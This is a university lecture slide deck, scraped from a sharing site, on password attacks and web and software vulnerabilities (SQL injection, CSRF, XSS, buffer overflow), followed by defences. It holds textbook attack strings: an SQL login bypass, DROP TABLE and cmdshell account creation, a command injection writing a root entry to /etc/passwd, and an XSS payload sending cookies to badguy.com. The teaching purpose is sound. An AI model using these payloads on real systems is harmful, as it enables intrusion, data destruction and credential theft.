1. PASSWORD ATTACK 2. APPLICATION ATTACK
|
|
- Carol Perry
- 5 years ago
- Views:
Transcription
1 1. PASSWORD ATTACK 2. APPLICATION ATTACK
2 References: 1. Bruce Schneier, Applied Cryptography 2. CEH v7 Tutorial 2 21/03/2017
3 Authentication Authentication using One-Way Functions Authentication using Public-Key Cryptography Attack 21/03/2017 3
4 Authentication 21/03/2017 4
5 When Alice logs into a host computer, how does the host know who she is? How does the host know she is not Eve trying to falsify Alice s identity? Traditionally, passwords solve this problem. Both Alice and the host know this secret piece of knowledge and the host requests it from Alice every time she tries to log in. 21/03/2017 5
6 Authentication using One-Way Functions 21/03/2017 6
7 The host does not need to know the passwords. The host just has to be able to differentiate valid passwords from invalid passwords. This is easy with one-way functions. Instead of storing passwords, the host stores one-way functions of the passwords. 21/03/2017 7
8 1. Alice sends the host her password. 2. The host performs a one-way function on the password. 3. The host compares the result of the one-way function to the value it previously stored. 21/03/2017 8
9 Since the host no longer stores a table of everybody s valid password, the threat of someone breaking into the host and stealing the password list is mitigated. The list of passwords operated on by the one-way function is useless, because the one-way function cannot be reversed to recover the passwords. 21/03/2017 9
10 Authentication using Public-Key Cryptography 21/03/
11 PROBLEM : When Alice sends her password to her host, anyone who has access to her data path can read it. Eve can be at any one of those points, listening to Alice s login sequence. If Eve has access to the processor memory of the host, she can see the password before the host hashes it. 21/03/
12 Public-key cryptography can solve this problem. The host keeps a file of every user s public key. All users keep their own private keys. 21/03/
13 When logging in, the protocol proceeds as follows: The host sends Alice a random string. Alice encrypts the string with her private key and sends it back to the host, along with her name. The host looks up Alice s public key in its database and decrypts the message using that public key. If the decrypted string matches what the host sent Alice in the first place, the host allows Alice access to the system. 21/03/
14 Secure proof-of-identity protocols take the following form: Alice performs a computation based on some random numbers and her private key and sends the result to the host. The host sends Alice a different random number. Alice makes some computation based on the random numbers (both the ones she generated and the one she received from the host) and her private key, and sends the result to the host. The host does some computation on the various numbers received from Alice and her public key to verify that she knows her private key. If she does, her identity is verified. 21/03/
15 If Alice does not trust the host any more than the host trusts Alice, then Alice will require the host to prove its identity in the same manner. Step (1) might seem unnecessary and confusing, but it is required to prevent attacks against the protocol. 21/03/
16 21/03/
17 Password Cracking Techniques (a) Dictionary attack (b) Brute force Attack (c) Hybrid Attack (d) Syllable Attack (e) Rulebased Attack (a) Based on familiar password (b) tries every combination of character (c) Like dictionary attack, but adds some number and symbol (d) Combination brute force attack and dictionary attack (e) Used when the attacker gets some information about password 21/03/
18 21/03/
19 Trojan enabling attackers to gets access to the stored password in the attacked computer Keylogger is a program that runs in the background and allow remote attackers to record every keystroke Spyware is a type of malware that allows attackers to get secret key gather information about person or organization 21/03/
20 21/03/
21 What does spyware do? Steals user s personal information and send it to remote server Monitor user s online activity Display annoying pop up and redirect browser to advertising site Decrease overall system security level Connects to remote pornography sites Reduce systems performance and causes software instability 21/03/
22 Purpose of Trojan: Steal information such as password, security codes, credit card information, using keylogger Delete or replace OS system critical file Generate fake traffic to create DoS attack Disable firewall and antivirus Use victim s PC for spamming Use victim s PC as a botnet 21/03/
23 21/03/
24 Default password is a password supplies by the manufacturer with new equipment that is password protected Ex: 21/03/
25 Windows stores user password in the Security Acccount Manager (SAM) not clear text, but hashed. 21/03/
26 References: 1. Network Security. John Mitchell. Standford University 2. CEH v7 Tutorial 26 21/03/2017
27
28 Web security threat model System Alice Web Attacker Sets up malicious site visited by victim; no control of network
29 Network security threat model Network Attacker System Intercepts and controls network communication Alice
30 Alice System Web Attacker Alice System Network Attacker
31 SQL Injection Browser sends malicious input to server Bad input checking fails to block malicious SQL CSRF Cross-site request forgery Bad web site sends browser request to good web site, using credentials of an innocent victim XSS Cross-site scripting Bad web site sends innocent victim a script that steals information from an honest web site
32 SQL Injection Browser sends malicious input to server Bad input checking leads to malicious SQL query CSRF Cross-site request forgery Uses SQL to change meaning of database command Bad web site sends request to good web site, using credentials of an innocent victim who visits site Leverage user s session at victim sever XSS Cross-site scripting Bad web site sends innocent victim a script that steals information from an honest web site Inject malicious script into trusted context
33 Background for SQL Injection
34 Attack goal: execute arbitrary code on the server Example code injection based on eval (PHP) (server side calculator) $in = $_GET[ exp']; eval('$ans = '. $in. ';'); Attack 10 ; system( rm *.* ) (URL encoded)
35 Example: PHP server-side code for sending Attacker can post $ = $_POST[ ] $subject = $_POST[ subject ] system( mail $ s $subject < /tmp/joinmynetwork ) OR =hacker@hackerhome.net & subject=foo < /usr/passwd; ls =hacker@hackerhome.net&subject=foo; echo evil::0:0:root:/:/bin/sh">>/etc/passwd; ls
36
37 (the wrong way) Sample PHP $recipient = $_POST[ recipient ]; $sql = "SELECT PersonID FROM Person WHERE Username='$recipient'"; $rs = $db->executequery($sql); Problem What if recipient is malicious string that changes the meaning of the query?
38 Victim Server 1 2 Attacker 3 receive valuable data unintended SQL query Victim SQL DB 38
39 CardSystems credit card payment processing company SQL injection attack in June 2005 put out of business The Attack 263,000 credit card #s stolen from database credit card #s stored unencrypted 43 million credit card #s exposed 39
40 WordPress SEO plugin by Yoast, March 2015 The latest version at the time of writing ( ) has been found to be affected by two authenticated (admin, editor or author user) Blind SQL Injection vulnerabilities. The authenticated Blind SQL Injection vulnerability can be found within the admin/class-bulk-editor-list-table.php file. The orderby and order GET parameters are not sufficiently sanitized before being used within a SQL query.
41 set ok = execute( "SELECT * FROM Users WHERE user=' " & form( user ) & " ' AND pwd=' " & form( pwd ) & ' ); if not ok.eof login success else fail; Is this exploitable? 41
42 Web Browser (Client) Enter Username & Password Web Server SELECT * FROM Users WHERE user='me' AND pwd='1234' DB Normal Query
43 Suppose user = ' or 1=1 -- (URL encoded) Then scripts does: ok = execute( SELECT WHERE user= ' ' or 1=1 -- ) The -- causes rest of line to be ignored. Now ok.eof is always false and login succeeds. The bad news: easy login to many sites this way. 43
44 Suppose user = ; DROP TABLE Users -- Then script does: ok = execute( SELECT WHERE user= ; DROP TABLE Users ) Deletes user table Similarly: attacker can add users, reset pwds, etc. 44
45 Suppose user = ; exec cmdshell net user badguy badpwd / ADD -- Then script does: ok = execute( SELECT WHERE username= ; exec ) If SQL server context runs as sa, attacker gets account on DB server 45
46 PHP: addslashes( or 1 = 1 -- ) outputs: \ or 1=1 -- Unicode attack: (GBK) $user = 0x bf 27 0x 5c \ 0x bf 27 0x bf 5c addslashes ($user) 0x bf 5c 27 Correct implementation: mysql_real_escape_string() 46
47 Never build SQL commands yourself! Use parameterized/prepared SQL Use ORM framework
48 Builds SQL queries by properly escaping args: \ Example: Parameterized SQL: (ASP.NET 1.1) Ensures SQL arguments are properly escaped. SqlCommand cmd = new SqlCommand( "SELECT * FROM UserTable WHERE username AND password dbconnection); cmd.parameters.add("@user", Request[ user ] ); cmd.parameters.add("@pwd", Request[ pwd ] ); cmd.executereader(); In PHP: bound parameters -- similar function 48
49
50 Browser Server
51 Server Victim User Victim Attack Server Q: how long do you stay logged in to Gmail? Facebook?. 51
52 Example: User logs in to bank.com Session cookie remains in browser state User visits another site containing: <form name=f action= <input name=recipient value=badguy> <script> document.f.submit(); </script> Browser sends user auth cookie with request Transaction will be fulfilled Problem: cookie auth is insufficient when side effects occur
53 Cookie: SessionID=523FA4cd2E User credentials
54 Home router User 3 Bad web site 54
55 [SRJ 07] Fact: 50% of home users have broadband router with a default or no password Drive-by Pharming attack: User visits malicious site JavaScript at site scans home network looking for broadband router: SOP allows send only messages Detect success using onerror: <IMG SRC= onerror = do() > Once found, login to router and change DNS server Problem: send-only access sufficient to reprogram router
56
57
58
59
60
61
62 referer: referer: What if honest site sends POST to attacker.com? Solution: origin header records redirect
63 Login CSRF Strict Referer/Origin header validation Login forms typically submit over HTTPS, not blocked HTTPS sites, such as banking sites Use strict Referer/Origin validation to prevent CSRF Other Use Ruby-on-Rails or other framework that implements secret token method correctly Origin header Alternative to Referer with fewer privacy problems Sent only on POST, sends only necessary data Defense against redirect-based attacks
64
65 Attack Server Victim client Victim Server
66 search field on victim.com: term = apple Server-side implementation of search.php: <HTML> <TITLE> Search Results </TITLE> <BODY> Results for <?php echo $_GET[term]?> :... </BODY> </HTML> echo search term into response
67 Consider link: (properly URL encoded) term = <script> window.open( = + document.cookie ) </script> What if user clicks on this link? 1. Browser goes to victim.com/search.php 2. Victim.com returns <HTML> Results for <script> </script> 3. Browser executes script: Sends badguy.com cookie for victim.com
68 Attack Server term = <script>... </script> Victim client <html> Results for <script> window.open( document.cookie...) </script> </html> Victim Server
69 An XSS vulnerability is present when an attacker can inject scripting code into pages generated by a web application Methods for injecting malicious code: Reflected XSS ( type 1 ) the attack script is reflected back to the user as part of a page from the victim site Stored XSS ( type 2 ) the attacker stores the malicious code in a resource managed by the web application, such as a database Others, such as DOM-based attacks
70 version 1 Attack Server 2 5 User Victim Server Victim
71 Attackers contacted users via and fooled them into accessing a particular URL hosted on the legitimate PayPal website. Injected code redirected PayPal visitors to a page warning users their accounts had been compromised. Victims were then redirected to a phishing site and prompted to enter sensitive financial data. Source:
72 SQL Injection Bad input checking allows malicious SQL query Known defenses address problem effectively CSRF Cross-site request forgery Forged request leveraging ongoing session Can be prevented (if XSS problems fixed) XSS Cross-site scripting Problem stems from echoing untrusted input Difficult to prevent; requires care, testing, tools, Other server vulnerabilities Increasing knowledge embedded in frameworks, tools, application development recommendations
73 Ref 1. Professor Hossein Saiedian. KU electrical negineering and komputer science.
74 A condition at an interface under which more input can be placed into a buffer or data holding area than the capacity allocated, overwriting other information. Attackers exploit such a condition to crash a system or to insert specially crafted code that allows them to gain control of the system.
75 A very common attack mechanism from 1988 Morris Worm to Code Red, Slammer, Sasser and many others Prevention techniques known Still of major concern due to legacy of widely deployed buggy continued careless programming techniques
76 Caused by programming error Allows more data to be stored than capacity available in a fixed sized buffer buffer can be on stack, heap, global data Overwriting adjacent memory locations corruption of program data unexpected transfer of control memory access violation execution of code chosen by attacker
77 int main(int argc, char *argv[]) { int valid = FALSE; char str1[8]; char str2[8]; } next_tag(str1); gets(str2); if (strncmp(str1, str2, 8) == 0) valid = TRUE; printf("buffer1: str1(%s), str2(%s), valid(%d)\n", str1, str2, valid); $ cc -g -o buffer1 buffer1.c $./buffer1 START buffer1: str1(start), str2(start), valid(1) $./buffer1 EVILINPUTVALUE buffer1: str1(tvalue), str2(evilinputvalue), valid(0) $./buffer1 BADINPUTBADINPUT buffer1: str1(badinput), str2(badinputbadinput), valid(1)
78 Memory Address Before gets(str2) After gets(str2) Contains Value of bffffbf4 34fcffbf 4... bffffbf bffffbec bffffbe8 08fcffbf.... bffffbe bffffbe bffffbdc bffffbd S T A R bffffbd bffffbd fcffbf fcffbf e N P U T B A D I 4e N P U T B A D I argv argc return addr old base ptr valid str1[4-7] str1[0-3] str2[4-7] str2[0-3]
79
80 To exploit a buffer overflow an attacker must identify a buffer overflow vulnerability in some program inspection, tracing execution, fuzzing tools understand how buffer is stored in memory and determine potential for corruption
81 At machine level all data an array of bytes interpretation depends on instructions used Modern high-level languages have a strong notion of type and valid operations not vulnerable to buffer overflows does incur overhead, some limits on use C and related languages have high-level control structures, but allow direct access to memory hence are vulnerable to buffer overflow have a large legacy of widely used, unsafe, and hence vulnerable code
82 Stack frame: Calling function: needs a data structure to store the return address and parameters to be passed Called function: needs a place to store its local variables somewhere different for every call
83 Occurs when buffer is located on stack used by Morris Worm Smashing the Stack paper popularized it Have local variables below saved frame pointer and return address hence overflow of a local buffer can potentially overwrite these key control items Attacker overwrites return address with address of desired code program, system library or loaded in buffer
84
85 Buffer overflows are widely exploited Large amount of vulnerable code in use despite cause and countermeasures known Two broad defense approaches compile-time - harden new programs run-time - handle attacks on existing programs
86 Use a modern high-level languages with strong typing not vulnerable to buffer overflow compiler enforces range checks and permissible operations on variables Do have cost in resource use And restrictions on access to hardware so still need some code in C like languages
87 If using potentially unsafe languages eg C Programmer must explicitly write safe code by design with new code extensive after code review of existing code, (e.g., OpenBSD) Buffer overflow safety a subset of general safe coding techniques Allow for graceful failure (know how things may go wrong) check for sufficient space in any buffer
88 Proposals for safety extensions (library replacements) to C performance penalties must compile programs with special compiler Several safer standard library variants new functions, e.g. strlcpy() safer re-implementation of standard functions as a dynamic library, e.g. Libsafe
89 Stackgaurd: add function entry and exit code to check stack for signs of corruption Use random canary e.g. Stackguard, Win/GS, GCC check for overwrite between local variables and saved frame pointer and return address abort program if change found issues: recompilation, debugger support Or save/check safe copy of return address (in a safe, non-corruptible memory area), e.g. Stackshield, RAD
90 Many BO attacks copy machine code into buffer and xfer ctrl to it Use virtual memory support to make some regions of memory non-executable (to avoid exec of attacker s code) e.g. stack, heap, global data need h/w support in MMU long existed on SPARC/Solaris systems recent on x86 Linux/Unix/Windows systems Issues: support for executable stack code
91 Manipulate location of key data structures stack, heap, global data: change address by 1 MB using random shift for each process have large address range on modern systems means wasting some has negligible impact Randomize location of heap buffers and location of standard library functions
92 Place guard pages between critical regions of memory (or between stack frames) flagged in MMU (mem mgmt unit) as illegal addresses any access aborts process Can even place between stack frames and heap buffers at execution time and space cost
93
NET 311 INFORMATION SECURITY
NET 311 INFORMATION SECURITY Networks and Communication Department Lec12: Software Security / Vulnerabilities lecture contents: o Vulnerabilities in programs Buffer Overflow Cross-site Scripting (XSS)
More informationWeb Application Security
CS 155 Spring 2016 Web Application Security 47,350,400 John Mitchell Acknowledgments: Lecture slides are from the Computer Security course taught by Dan Boneh and John Mitchell at Stanford University.
More informationWeb Application Security
CS 155 Spring 2013 Web Application Security John Mitchell Three top web site vulnerabilites SQL Injection Browser sends malicious input to server Bad input checking leads to malicious SQL query CSRF Cross-site
More informationWeb Security Part 2. Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu
Web Security Part 2 CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu Liberal borrowing from Mitchell, Boneh, Stanford CS 155 University of Wisconsin
More informationWeb Security Part 2. Professor Ristenpart h9p:// rist at cs dot wisc dot edu
Web Security Part 2 CS642: Computer Security Professor Ristenpart h9p://www.cs.wisc.edu/~rist/ rist at cs dot wisc dot edu Liberal borrowing from Mitchell, Boneh, Stanford CS 155 University of Wisconsin
More informationWeb Application Security. * Original slides were prepared by John Mitchell
Web Application Security * Original slides were prepared by John Mitchell OWASP Top Ten (2013) A-1 Injection Untrusted data is sent to an interpreter as part of a command or query. A-2 Authentication and
More informationBuffer overflow background
and heap buffer background Comp Sci 3600 Security Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Outline and heap buffer Heap 1 and heap 2 3 buffer 4 5 Heap Address Space and heap buffer
More informationWEB SECURITY: XSS & CSRF
WEB SECURITY: XSS & CSRF CMSC 414 FEB 22 2018 Cross-Site Request Forgery (CSRF) URLs with side-effects http://bank.com/transfer.cgi?amt=9999&to=attacker GET requests should have no side-effects, but often
More informationInformation Security CS 526 Topic 11
Information Security CS 526 Topic 11 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More informationInformation Security CS 526 Topic 8
Information Security CS 526 Topic 8 Web Security Part 1 1 Readings for This Lecture Wikipedia HTTP Cookie Same Origin Policy Cross Site Scripting Cross Site Request Forgery 2 Background Many sensitive
More information2/16/18. CYSE 411/AIT 681 Secure Software Engineering. Secure Coding. The Web. Topic #11. Web Security. Instructor: Dr. Kun Sun
CYSE 411/AIT 681 Secure Software Engineering Topic #11. Web Security Instructor: Dr. Kun Sun Secure Coding String management Pointer Subterfuge Dynamic memory management Integer security Formatted output
More informationProgram Security and Vulnerabilities Class 2
Program Security and Vulnerabilities Class 2 CEN-5079: 28.August.2017 1 Secure Programs Programs Operating System Device Drivers Network Software (TCP stack, web servers ) Database Management Systems Integrity
More informationWeb Security: Web Application Security [continued]
CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Web Application Security [continued] Spring 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann,
More informationAdvanced Web Technology 10) XSS, CSRF and SQL Injection
Berner Fachhochschule, Technik und Informatik Advanced Web Technology 10) XSS, CSRF and SQL Injection Dr. E. Benoist Fall Semester 2010/2011 1 Table of Contents Cross Site Request Forgery - CSRF Presentation
More informationWeb Application Security. Philippe Bogaerts
Web Application Security Philippe Bogaerts OWASP TOP 10 3 Aim of the OWASP Top 10 educate developers, designers, architects and organizations about the consequences of the most common web application security
More informationCIS 4360 Secure Computer Systems XSS
CIS 4360 Secure Computer Systems XSS Professor Qiang Zeng Spring 2017 Some slides are adapted from the web pages by Kallin and Valbuena Previous Class Two important criteria to evaluate an Intrusion Detection
More informationP2_L12 Web Security Page 1
P2_L12 Web Security Page 1 Reference: Computer Security by Stallings and Brown, Chapter (not specified) The web is an extension of our computing environment, because most of our daily tasks involve interaction
More informationRobust Defenses for Cross-Site Request Forgery
University of Cyprus Department of Computer Science Advanced Security Topics Robust Defenses for Cross-Site Request Forgery Name: Elena Prodromou Instructor: Dr. Elias Athanasopoulos Authors: Adam Barth,
More informationAttacks Against Websites. Tom Chothia Computer Security, Lecture 11
Attacks Against Websites Tom Chothia Computer Security, Lecture 11 A typical web set up TLS Server HTTP GET cookie Client HTML HTTP file HTML PHP process Display PHP SQL Typical Web Setup HTTP website:
More informationCSCD 303 Essential Computer Security Fall 2018
CSCD 303 Essential Computer Security Fall 2018 Lecture 17 XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate security of Web Browser/Server
More informationWeb Security 2 https://www.xkcd.com/177/ http://xkcd.com/1323/ Encryption basics Plaintext message key secret Encryp)on Func)on Ciphertext Insecure network Decryp)on Func)on Curses! Foiled again! key Plaintext
More informationWeb Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin
Web Attacks, con t CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 22, 2011 Announcements See Still confused
More information2/16/18. Secure Coding. CYSE 411/AIT 681 Secure Software Engineering. Web Security Outline. The Web. The Web, Basically.
Secure Coding CYSE 411/AIT 681 Secure Software Engineering Topic #11. Web Security Instructor: Dr. Kun Sun String management Pointer Subterfuge Dynamic memory management Integer security Formatted output
More informationComputer Security CS 426 Lecture 41
Computer Security CS 426 Lecture 41 StuxNet, Cross Site Scripting & Cross Site Request Forgery CS426 Fall 2010/Lecture 36 1 StuxNet: Overview Windows-based Worm First reported in June 2010, the general
More informationHow is state managed in HTTP sessions. Web basics: HTTP cookies. Hidden fields (2) The principle. Disadvantage of this approach
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh March 30, 2015 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the server sends
More informationCSCD 303 Essential Computer Security Fall 2017
CSCD 303 Essential Computer Security Fall 2017 Lecture 18a XSS, SQL Injection and CRSF Reading: See links - End of Slides Overview Idea of XSS, CSRF and SQL injection is to violate the security of the
More informationINF3700 Informasjonsteknologi og samfunn. Application Security. Audun Jøsang University of Oslo Spring 2015
INF3700 Informasjonsteknologi og samfunn Application Security Audun Jøsang University of Oslo Spring 2015 Outline Application Security Malicious Software Attacks on applications 2 Malicious Software 3
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh February 11, 2016 1 / 27 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationCSE 484 / CSE M 584: Computer Security and Privacy. Web Security. Autumn Tadayoshi (Yoshi) Kohno
CSE 484 / CSE M 584: Computer Security and Privacy Web Security Autumn 2018 Tadayoshi (Yoshi) Kohno yoshi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann, Dan Halperin, Ada Lerner, John Manferdelli,
More informationCSE361 Web Security. Attacks against the client-side of web applications. Nick Nikiforakis
CSE361 Web Security Attacks against the client-side of web applications Nick Nikiforakis nick@cs.stonybrook.edu Despite the same origin policy Many things can go wrong at the client-side of a web application
More informationCSE 565 Computer Security Fall 2018
CSE 565 Computer Security Fall 2018 Lecture 14: Software Security Department of Computer Science and Engineering University at Buffalo 1 Software Security Exploiting software vulnerabilities is paramount
More informationWeb basics: HTTP cookies
Web basics: HTTP cookies Myrto Arapinis School of Informatics University of Edinburgh November 20, 2017 1 / 32 How is state managed in HTTP sessions HTTP is stateless: when a client sends a request, the
More informationWeb Security: Web Application Security [continued]
CSE 484 / CSE M 584: Computer Security and Privacy Web Security: Web Application Security [continued] Fall 2017 Franziska (Franzi) Roesner franzi@cs.washington.edu Thanks to Dan Boneh, Dieter Gollmann,
More informationLecture Overview. IN5290 Ethical Hacking
Lecture Overview IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi How to use Burp
More informationLecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks
IN5290 Ethical Hacking Lecture 6: Web hacking 2, Cross Site Scripting (XSS), Cross Site Request Forgery (CSRF), Session related attacks Universitetet i Oslo Laszlo Erdödi Lecture Overview How to use Burp
More informationBuffer overflow prevention, and other attacks
Buffer prevention, and other attacks Comp Sci 3600 Security Outline 1 2 Two approaches to buffer defense Aim to harden programs to resist attacks in new programs Run time Aim to detect and abort attacks
More informationRobust Defenses for Cross-Site Request Forgery Review
Robust Defenses for Cross-Site Request Forgery Review Network Security Instructor:Dr. Shishir Nagaraja Submitted By: Jyoti Leeka October 16, 2011 1 Introduction to the topic and the reason for the topic
More informationSecurity for the Web. Thanks to Dave Levin for some slides
Security for the Web Thanks to Dave Levin for some slides The Web Security for the World-Wide Web (WWW) presents new vulnerabilities to consider: SQL injection, Cross-site Scripting (XSS), These share
More informationWeb Application Security
Web Application Security Rajendra Kachhwaha rajendra1983@gmail.com October 16, 2015 Lecture 16: 1/ 14 Outline Browser Security Principles: 1 Cross Site Scripting (XSS) 2 Types of XSS 3 Lecture 16: 2/ 14
More informationComputer Security 3e. Dieter Gollmann. Chapter 18: 1
Computer Security 3e Dieter Gollmann www.wiley.com/college/gollmann Chapter 18: 1 Chapter 18: Web Security Chapter 18: 2 Web 1.0 browser HTTP request HTML + CSS data web server backend systems Chapter
More informationCIS 551 / TCOM 401 Computer and Network Security. Spring 2008 Lecture 24
CIS 551 / TCOM 401 Computer and Network Security Spring 2008 Lecture 24 Announcements Project 4 is Due Friday May 2nd at 11:59 PM Final exam: Friday, May 12th. Noon - 2:00pm DRLB A6 Today: Web security
More informationComputer and Network Security
CIS 551 / TCOM 401 Computer and Network Security Spring 2009 Lecture 24 Announcements Plan for Today: Web Security Part Project 4 is due 28 April 2009 at 11:59 pm Final exam has been scheduled: Friday,
More informationFundamentals of Computer Security
Fundamentals of Computer Security Spring 2015 Radu Sion Software Errors Buffer Overflow TOCTTOU 2005-15 Portions copyright by Bogdan Carbunar and Wikipedia. Used with permission Why Security Vulnerabilities?
More informationCS 142 Winter Session Management. Dan Boneh
CS 142 Winter 2009 Session Management Dan Boneh Sessions A sequence of requests and responses from one browser to one (or more) sites Session can be long (Gmail - two weeks) or short without session mgmt:
More informationWeb Attacks, con t. CS 161: Computer Security. Prof. Vern Paxson. TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin
Web Attacks, con t CS 161: Computer Security Prof. Vern Paxson TAs: Devdatta Akhawe, Mobin Javed & Matthias Vallentin http://inst.eecs.berkeley.edu/~cs161/ February 24, 2011 Announcements Guest lecture
More informationIs Browsing Safe? Web Browser Security. Subverting the Browser. Browser Security Model. XSS / Script Injection. 1. XSS / Script Injection
Is Browsing Safe? Web Browser Security Charlie Reis Guest Lecture - CSE 490K - 5/24/2007 Send Spam Search Results Change Address? Install Malware Web Mail Movie Rentals 2 Browser Security Model Pages are
More informationAttacks Against Websites 3 The OWASP Top 10. Tom Chothia Computer Security, Lecture 14
Attacks Against Websites 3 The OWASP Top 10 Tom Chothia Computer Security, Lecture 14 OWASP top 10. The Open Web Application Security Project Open public effort to improve web security: Many useful documents.
More informationLecture 6: Web Security CS /17/2017
Lecture 6: Web Security CS5431 03/17/2017 2015 Security Incidents Web Vulnerabilities by Year 2500 2000 1500 1000 500 0 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2011 2012 2013 2014 2015
More informationWEB SECURITY WORKSHOP TEXSAW Presented by Solomon Boyd and Jiayang Wang
WEB SECURITY WORKSHOP TEXSAW 2014 Presented by Solomon Boyd and Jiayang Wang Introduction and Background Targets Web Applications Web Pages Databases Goals Steal data Gain access to system Bypass authentication
More informationPerslink Security. Perslink Security. Eleonora Petridou Pascal Cuylaerts. System And Network Engineering University of Amsterdam.
Eleonora Petridou Pascal Cuylaerts System And Network Engineering University of Amsterdam June 30, 2011 Outline Research question About Perslink Approach Manual inspection Automated tests Vulnerabilities
More informationApplication vulnerabilities and defences
Application vulnerabilities and defences In this lecture We examine the following : SQL injection XSS CSRF SQL injection SQL injection is a basic attack used to either gain unauthorized access to a database
More informationCSE 127 Computer Security
CSE 127 Computer Security Fall 2015 Web Security I: SQL injection Stefan Savage The Web creates new problems Web sites are programs Partially implemented in browser» Javascript, Java, Flash Partially implemented
More informationSecurity for the Web. Thanks to Dave Levin for some slides
Security for the Web Thanks to Dave Levin for some slides The Web Security for the World-Wide Web (WWW) presents new vulnerabilities to consider: SQL injection, Cross-site Scripting (XSS), These share
More informationWeb Security Computer Security Peter Reiher December 9, 2014
Web Security Computer Security Peter Reiher December 9, 2014 Page 1 Web Security Lots of Internet traffic is related to the web Much of it is financial in nature Also lots of private information flow around
More informationDepartment of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY Fall Quiz I
Department of Electrical Engineering and Computer Science MASSACHUSETTS INSTITUTE OF TECHNOLOGY 6.858 Fall 2010 Quiz I All problems are open-ended questions. In order to receive credit you must answer
More informationCopyright
1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?
More informationApplication Layer Attacks. Application Layer Attacks. Application Layer. Application Layer. Internet Protocols. Application Layer.
Application Layer Attacks Application Layer Attacks Week 2 Part 2 Attacks Against Programs Application Layer Application Layer Attacks come in many forms and can target each of the 5 network protocol layers
More informationCSCE 813 Internet Security Case Study II: XSS
CSCE 813 Internet Security Case Study II: XSS Professor Lisa Luo Fall 2017 Outline Cross-site Scripting (XSS) Attacks Prevention 2 What is XSS? Cross-site scripting (XSS) is a code injection attack that
More informationApplication Security Introduction. Tara Gu IBM Product Security Incident Response Team
Application Security Introduction Tara Gu IBM Product Security Incident Response Team About Me - Tara Gu - tara.weiqing@gmail.com - Duke B.S.E Biomedical Engineering - Duke M.Eng Computer Engineering -
More informationWeb Security: Vulnerabilities & Attacks
Computer Security Course. Song Dawn Web Security: Vulnerabilities & Attacks Cross-site Scripting What is Cross-site Scripting (XSS)? Vulnerability in web application that enables attackers to inject client-side
More informationCS 155 Project 2. Overview & Part A
CS 155 Project 2 Overview & Part A Project 2 Web application security Composed of two parts Part A: Attack Part B: Defense Due date: Part A: May 5th (Thu) Part B: May 12th (Thu) Project 2 Ruby-on-Rails
More informationRobust Defenses for Cross-Site Request Forgery
Robust Defenses for Cross-Site Request Forgery Tsampanaki Nikoleta Lilitsis Prodromos Gigis Petros Paper Authors: Adam Barth, Collin Jackson, John C. Mitchell Outline What is CSRF attack? What is a login
More informationJohn Coggeshall Copyright 2006, Zend Technologies Inc.
PHP Security Basics John Coggeshall Copyright 2006, Zend Technologies Inc. Welcome! Welcome to PHP Security Basics Who am I: John Coggeshall Lead, North American Professional Services PHP 5 Core Contributor
More informationOWASP Top 10 The Ten Most Critical Web Application Security Risks
OWASP Top 10 The Ten Most Critical Web Application Security Risks The Open Web Application Security Project (OWASP) is an open community dedicated to enabling organizations to develop, purchase, and maintain
More informationCOMP9321 Web Application Engineering
COMP9321 Web Application Engineering Web Application Security Dr. Basem Suleiman Service Oriented Computing Group, CSE, UNSW Australia Semester 1, 2016, Week 8 http://webapps.cse.unsw.edu.au/webcms2/course/index.php?cid=2442
More informationLecture Notes on Safety and Information Flow on the Web: II
15-316: Software Foundations of Security and Privacy Lecture Notes on Safety and Information Flow on the Web: II Matt Fredrikson Carnegie Mellon University Lecture 18 1 Introduction In the previous lecture
More informationepldt Web Builder Security March 2017
epldt Web Builder Security March 2017 TABLE OF CONTENTS Overview... 4 Application Security... 5 Security Elements... 5 User & Role Management... 5 User / Reseller Hierarchy Management... 5 User Authentication
More informationW e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s
W e b A p p l i c a t i o n S e c u r i t y : T h e D e v i l i s i n t h e D e t a i l s Session I of III JD Nir, Security Analyst Why is this important? ISE Proprietary Agenda About ISE Web Applications
More informationSecurity+ Guide to Network Security Fundamentals, Third Edition. Chapter 3 Protecting Systems
Security+ Guide to Network Security Fundamentals, Third Edition Chapter 3 Protecting Systems Objectives Explain how to harden operating systems List ways to prevent attacks through a Web browser Define
More informationDEFENSIVE PROGRAMMING. Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology
DEFENSIVE PROGRAMMING Lecture for EDA 263 Magnus Almgren Department of Computer Science and Engineering Chalmers University of Technology Traditional Programming When writing a program, programmers typically
More informationWeb Applica+on Security
Web Applica+on Security Raluca Ada Popa Feb 25, 2013 6.857: Computer and Network Security See last slide for credits Outline Web basics: HTTP Web security: Authen+ca+on: passwords, cookies Security amacks
More informationC1: Define Security Requirements
